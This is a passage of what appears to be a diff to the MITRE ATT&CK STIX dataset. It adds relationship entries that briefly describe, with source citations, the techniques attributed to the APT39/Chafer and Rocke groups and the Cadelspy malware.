+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used post-exploitation tools including RemCom and the Non-sucking Service Manager (NSSM) to execute processes.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--364be248-6fa2-42a2-847b-35e6f43fd06d",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.804Z",
+ "created": "2020-05-22T15:43:05.223Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used the post exploitation tool CrackMapExec to enumerate network shares.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--307e732c-c407-4466-951b-38062bb5e32b",
+ "type": "relationship",
+ "modified": "2020-05-29T20:22:11.379Z",
+ "created": "2020-05-22T15:43:05.281Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used PowerShell to execute malicious code.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0f50a4e4-6ceb-4ead-88ed-147592e0b398",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.667Z",
+ "created": "2020-05-22T15:43:05.288Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has communicated with C2 through files uploaded to DropBox.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--5b875be8-3849-46e2-80cb-dec502f78f52",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.635Z",
+ "created": "2020-05-22T18:00:52.255Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used remote access tools that leverage DNS in communications with C2.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--9a66e38c-ea79-4b7b-bf74-555da87d58c3",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.671Z",
+ "created": "2020-05-22T18:00:52.264Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--cc3502b5-30cc-4473-ad48-42d51a6ef6d1",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--c906ddd0-e3fb-42ad-84cb-84ca093ddbb2",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.684Z",
+ "created": "2020-05-22T18:00:52.267Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used HTTP in communications with C2.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--d9dce15d-68d8-46af-a7ec-354bf5093c49",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.678Z",
+ "created": "2020-05-22T18:00:52.273Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
+ "external_references": [
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used different versions of Mimikatz to obtain credentials.(Citation: BitDefender Chafer May 2020)",
+ "relationship_type": "uses",
+ "id": "relationship--0f93a49a-11c8-49d8-9b58-e7136e6bc850",
+ "type": "relationship",
+ "modified": "2020-05-29T13:22:52.640Z",
+ "created": "2020-05-22T18:06:30.013Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used SMB for lateral movement.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fa82d7c2-bdc5-4945-9d59-5b40eb9a7454",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.921Z",
+ "created": "2020-05-22T19:37:14.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has downloaded tools to compromised hosts.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--60f1cf34-8c60-47b7-ba9a-88c2575006f9",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.209Z",
+ "created": "2020-05-22T19:37:14.209Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used tools capable of stealing contents of the clipboard.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0f81e969-dfc4-4d37-8664-59c31bd7116c",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.265Z",
+ "created": "2020-05-22T19:37:14.265Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a tool to steal files from the compromised host.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0e4c55fc-a923-4c05-89ce-3102620a41d7",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.268Z",
+ "created": "2020-05-22T19:37:14.268Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used tools for capturing keystrokes.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--0ddcf163-015f-46a2-8de7-375712d92bae",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.935Z",
+ "created": "2020-05-22T19:37:14.272Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used a screen capture utility to take screenshots on a compromised host.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--932beba4-bb6a-4174-abe3-353d2e39337c",
+ "type": "relationship",
+ "modified": "2020-05-29T14:02:52.937Z",
+ "created": "2020-05-22T19:37:14.274Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "tool--9de2308e-7bed-43a3-8e58-f194b3586700",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--3b1a912a-9854-428f-9dde-bd2100c554d8",
+ "type": "relationship",
+ "modified": "2020-05-22T19:37:14.489Z",
+ "created": "2020-05-22T19:37:14.489Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c",
+ "external_references": [
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
+ }
+ ],
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has used SQL injection for initial compromise.(Citation: Symantec Chafer February 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--fab9f76e-570c-4235-8045-dec89714d435",
+ "type": "relationship",
+ "modified": "2020-05-22T20:04:15.481Z",
+ "created": "2020-05-22T20:04:15.481Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to compress stolen data into a .cab file.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--59ad51ee-bc2e-4428-be3f-ddf50cf0deb9",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.510Z",
+ "created": "2020-05-22T20:27:31.510Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to capture screenshots and webcam photos.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--dd812f2c-a0a0-4543-af23-25e71c899bf4",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.512Z",
+ "created": "2020-05-22T20:27:31.512Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to record audio from the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--721b7c0a-4774-4b09-882f-be7ba1cab7a5",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.527Z",
+ "created": "2020-05-22T20:27:31.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to identify open windows on the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--13e89239-af0e-4f3c-9bb9-42b113f64873",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.544Z",
+ "created": "2020-05-22T20:27:31.544Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal information about printers and the documents sent to printers.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--dfdd269c-9d78-46da-8b31-3141a5398bfd",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.549Z",
+ "created": "2020-05-22T20:27:31.549Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to discover information about the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--d826904c-7853-4f85-a5e4-948b21ae374c",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.551Z",
+ "created": "2020-05-22T20:27:31.551Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to steal data from the clipboard.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--5c859db1-13ba-4bf8-a8d3-7fd99e061c45",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.553Z",
+ "created": "2020-05-22T20:27:31.553Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "[Cadelspy](https://attack.mitre.org/software/S0454) has the ability to log keystrokes on the compromised host.(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--26339d57-98d9-4323-97e8-03642f82e245",
+ "type": "relationship",
+ "modified": "2020-05-22T20:27:31.570Z",
+ "created": "2020-05-22T20:27:31.570Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44e43fad-ffcb-4210-abcf-eaaed9735f80",
+ "target_ref": "malware--a705b085-1eae-455e-8f4d-842483d814eb",
+ "external_references": [
+ {
+ "description": "Symantec Security Response. (2015, December 7). Iran-based attackers use back door threats to spy on Middle Eastern targets. Retrieved April 17, 2019.",
+ "url": "https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets",
+ "source_name": "Symantec Chafer Dec 2015"
+ }
+ ],
+ "description": "(Citation: Symantec Chafer Dec 2015)",
+ "relationship_type": "uses",
+ "id": "relationship--5e2b2df2-e54f-44b5-bd86-fefdae513bc2",
+ "type": "relationship",
+ "modified": "2020-05-22T20:29:56.339Z",
+ "created": "2020-05-22T20:29:56.339Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106)'s miner connects to a C2 server using port 51640.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--f7f947cd-6e0c-499c-8cdf-293e38657e31",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.411Z",
+ "created": "2020-05-26T16:17:59.411Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--dfefe2ed-4389-4318-8762-f0272b350a1b",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "description": "Anomali Labs. (2019, March 15). Rocke Evolves Its Arsenal With a New Malware Family Written in Golang. Retrieved April 24, 2019."
+ }
+ ],
+ "description": "[Rocke](https://attack.mitre.org/groups/G0106) has installed a systemd service script to maintain persistence.(Citation: Anomali Rocke March 2019)\t",
+ "relationship_type": "uses",
+ "id": "relationship--a430e3fa-bfc0-4ea8-8264-217f6aa015fc",
+ "type": "relationship",
+ "modified": "2020-05-26T16:17:59.416Z",
+ "created": "2020-05-26T16:17:59.416Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--44102191-3a31-45f8-acbe-34bdb441d5ad",
+ "target_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334",
+ "external_references": [
+ {
+ "source_name": "Anomali Rocke March 2019",
+ "url": "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
